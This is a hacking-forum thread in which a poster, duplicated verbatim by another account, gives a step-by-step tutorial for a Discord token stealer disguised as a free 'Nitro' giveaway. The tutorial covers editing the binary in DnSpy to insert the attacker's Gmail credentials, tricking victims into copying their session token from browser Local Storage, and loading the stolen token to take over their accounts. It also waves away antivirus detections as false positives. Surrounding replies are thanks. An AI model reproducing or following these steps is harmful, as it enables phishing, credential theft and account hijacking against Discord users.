ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!

Photo

Discord Token Stealer | Hack Discord Accounts without Emails or Passwords | Botting

• Please log in to reply
Discord Token Stealer | Hack Discord Accounts without Emails or Passwords | Botting

cowardtv
cowardtv
    Rep
    Advanced Member

Threads: 1
Credits: 0

Seven years registered

i wil try it for sure !

ircziii
ircziii
    Rep
    Lurker

Threads: 0
Five years registered

tyyy

ClitcheGamer
ClitcheGamer
    Rep
    Advanced Member

Threads: 3
Seven years registered

Thanks so much for share man!

Lindycore
Lindycore
    Rep
    Lurker

Five years registered

這是個有用的帖子

fakesdfgsdfgs
fakesdfgsdfgs
    Rep
    Lurker

Five years registered

This is almost a Crack I guess I stole this from some chat some kid bragging about how he made it (Note: his email and password was stored in the code xD WAS)

This is not really phishing I guess..... Just stealing TBH You put a Discord token and use there token to use them as a discord chat bot or just use there account you cant change the email or password you dont have perms to do that nor you dont get that 

and you cant change there password either but this method is much more deadly

They think they are getting discord nitro but no ...or you can put sign up to become my bot I dont know nor care If you have any problems with this anyone pm me 

yes I know bad Grammar not the best at English Ill have another method soon to come out as well may be better but again you can login as them see there pms and shit 

Lets get into it........

Today I will be showing a simple discord Nitro Stealer coded by some dude I don't know VB.net
I could have added features MAYBE to cut down these steps but I didn't o well sorry 
I will leave scan links let you know thought gets like not detection mainly its just a tool sends Tokens 
can the tool tell if its a token No not really you can put random shit in but if you find the right people they will fall for it
what is a Discord token well long story short if someone gives you their Token for discord well.. You have control over there whole account
you can message people you can mess around in group chats etc your them even if you dont have there password
nothing the less lets get started simply give someone your version of discord nitro manipulate them into putting in there token it will send to your desired email default is Gmail

well lets get started.....

First download the following

DOWNLOADS

Get_Nitro

Zippyshare

Dbree

Anonfiles

ge.tt

FileDropper

DnSpy

Please Login or Register to see this Hidden Content

click releases a Little bit above the clone and download to the left a little and click DnSpy.zip download it extract it and open and run the regular DnSpy.exe in the folder 

Then enable Less secure apps to use your gmail account (AKA) Discord Nitro 
go to

to enable less secure apps
Also make sure you dont have super verification on your account so the process dosnt fail 
as in don't have 2fa is possible or verify number bullshit if it dosnt work  sign out of your gmail account
and sign back in see whats up 

(I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS RETRIEVE THERE TOKEN AND ADD THEM AS A BOT FOR THERE ACCOUNT IF THEY AGREE TO BE A BOT ;)  you can edit the text to not say get discord nitro blah bah and say apply to be a bot for discord ETC )

then...

Drag and drop Get_Nitro.exe to DnSpy in the empty space to the left and let it load for a little
you can edit the language setting to be CSharp is what I like best and or VB.net

Screenshot_521.png

Once loaded select the drop downs in the left side bar select the follwoing Drop downs 
Get Nitro --> Get Nitro --> Get_nitro --> Form1 --> then select .ctor
Right click in the right sqaure empty space select edit class (C#) or what ever you have there

Screenshot_522.png

Now listen up where the under line green lines are and or where it says PUT-EMAIL-HERE
put your email address there then where it says PUT-PASSWORD-HERE put your email password there
make sure you dont remove any lines quotes commas or anything like that unless you know what you are doing
where the orange lines are you can put your own text there IF the token successfully sends if the gmail is working
put any text withing the quotes marks ETC also all of this starts on like 30 ish

Screenshot_523.png

Lastly click compile in the bottom right then on the top left where it says file click save all
select the location you want to save your new discord nitro file to (I selected desktop ) and click ok

Screenshot_524.png

Screenshot_525.png

Screenshot_526.png

Now thats that send that to someone to help them get there token tell them
go onto there browser open discord right click anywhere click 
Inspect Element --> Click Application --> Click Local Storage --> Click

and it will list a bunch of items you will see a thing called token The line in quotes example
token          "dzsbhkfksdhgfkjdsg4f654sdgf5gdfg4"  <---- Thats the token make them put that one in
Then tell them to click upgrade to nitro 

Screenshot_529.png

check your email it will be there Boom now you have there token how to use it?
repeat the steps with inspect element in your browser in discord --> Application --> Local Storage -->

--> select space in the quotes for token paste there token in the quotes  reload the browser
Now you can use there account for botting or for a bot you dont need a email or password you can use there account for a alt as well well since discord bots are big

Screenshot_530.png

Thats all I hoped you guys liked this easy tutorial
If you need me to remove this just pm me how do you know if it fails if it didnt send the email and or it didnt pop up with your will receive discord nitro soon

EXTRAS

IMAGES BACKUP DOWNLOAD IF IMAGES GET DELETED 

Dbree

Zippyshare

DnSpy Back Up

Dbree

Zippyshare

SCANS

Get_Nitro scans:

Virustotal:

(Just false positives Ill link deep scan in a few minutes)

Hybrid Analysis

as you see CLEAN 

i just want to see it

aaassss112
aaassss112
    Rep
    Lurker

• Pip
Five years registered

ty

BraidedPalm
BraidedPalm
    Rep
    Lurker

• Pip
Five years registered

Naisu!

juicysddsd
juicysddsd
    Rep
    Lurker

Five years registered

This is almost a Crack I guess I stole this from some chat some kid bragging about how he made it (Note: his email and password was stored in the code xD WAS)

This is not really phishing I guess..... Just stealing TBH You put a Discord token and use there token to use them as a discord chat bot or just use there account you cant change the email or password you dont have perms to do that nor you dont get that 

and you cant change there password either but this method is much more deadly

They think they are getting discord nitro but no ...or you can put sign up to become my bot I dont know nor care If you have any problems with this anyone pm me 

yes I know bad Grammar not the best at English Ill have another method soon to come out as well may be better but again you can login as them see there pms and shit 

Lets get into it........

Today I will be showing a simple discord Nitro Stealer coded by some dude I don't know VB.net
I could have added features MAYBE to cut down these steps but I didn't o well sorry 
I will leave scan links let you know thought gets like not detection mainly its just a tool sends Tokens 
can the tool tell if its a token No not really you can put random shit in but if you find the right people they will fall for it
what is a Discord token well long story short if someone gives you their Token for discord well.. You have control over there whole account
you can message people you can mess around in group chats etc your them even if you dont have there password
nothing the less lets get started simply give someone your version of discord nitro manipulate them into putting in there token it will send to your desired email default is Gmail

well lets get started.....

First download the following

DOWNLOADS

Get_Nitro

Zippyshare

Dbree

Anonfiles

ge.tt

FileDropper

DnSpy

click releases a Little bit above the clone and download to the left a little and click DnSpy.zip download it extract it and open and run the regular DnSpy.exe in the folder 

Then enable Less secure apps to use your gmail account (AKA) Discord Nitro 
go to

to enable less secure apps
Also make sure you dont have super verification on your account so the process dosnt fail 
as in don't have 2fa is possible or verify number bullshit if it dosnt work  sign out of your gmail account
and sign back in see whats up 

(I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS RETRIEVE THERE TOKEN AND ADD THEM AS A BOT FOR THERE ACCOUNT IF THEY AGREE TO BE A BOT ;)  you can edit the text to not say get discord nitro blah bah and say apply to be a bot for discord ETC )

then...

Drag and drop Get_Nitro.exe to DnSpy in the empty space to the left and let it load for a little
you can edit the language setting to be CSharp is what I like best and or VB.net

Screenshot_521.png

Once loaded select the drop downs in the left side bar select the follwoing Drop downs 
Get Nitro --> Get Nitro --> Get_nitro --> Form1 --> then select .ctor
Right click in the right sqaure empty space select edit class (C#) or what ever you have there

Screenshot_522.png

Now listen up where the under line green lines are and or where it says PUT-EMAIL-HERE
put your email address there then where it says PUT-PASSWORD-HERE put your email password there
make sure you dont remove any lines quotes commas or anything like that unless you know what you are doing
where the orange lines are you can put your own text there IF the token successfully sends if the gmail is working
put any text withing the quotes marks ETC also all of this starts on like 30 ish

Screenshot_523.png

Lastly click compile in the bottom right then on the top left where it says file click save all
select the location you want to save your new discord nitro file to (I selected desktop ) and click ok

Screenshot_524.png

Screenshot_525.png

Screenshot_526.png

Now thats that send that to someone to help them get there token tell them
go onto there browser open discord right click anywhere click 
Inspect Element --> Click Application --> Click Local Storage --> Click

and it will list a bunch of items you will see a thing called token The line in quotes example
token          "dzsbhkfksdhgfkjdsg4f654sdgf5gdfg4"  <---- Thats the token make them put that one in
Then tell them to click upgrade to nitro 

Screenshot_529.png

check your email it will be there Boom now you have there token how to use it?
repeat the steps with inspect element in your browser in discord --> Application --> Local Storage -->

--> select space in the quotes for token paste there token in the quotes  reload the browser
Now you can use there account for botting or for a bot you dont need a email or password you can use there account for a alt as well well since discord bots are big

Screenshot_530.png

Thats all I hoped you guys liked this easy tutorial
If you need me to remove this just pm me how do you know if it fails if it didnt send the email and or it didnt pop up with your will receive discord nitro soon

EXTRAS

IMAGES BACKUP DOWNLOAD IF IMAGES GET DELETED 

Dbree

Zippyshare

DnSpy Back Up

Dbree

Zippyshare

SCANS

Get_Nitro scans:

Virustotal:

(Just false positives Ill link deep scan in a few minutes)

Hybrid Analysis

as you see CLEAN 

thanks for shared brò!

gamer

MiDoKingStewart
MiDoKingStewart
    Rep
    Veteran

• PipPipPipPipPipPipPip
Threads: 1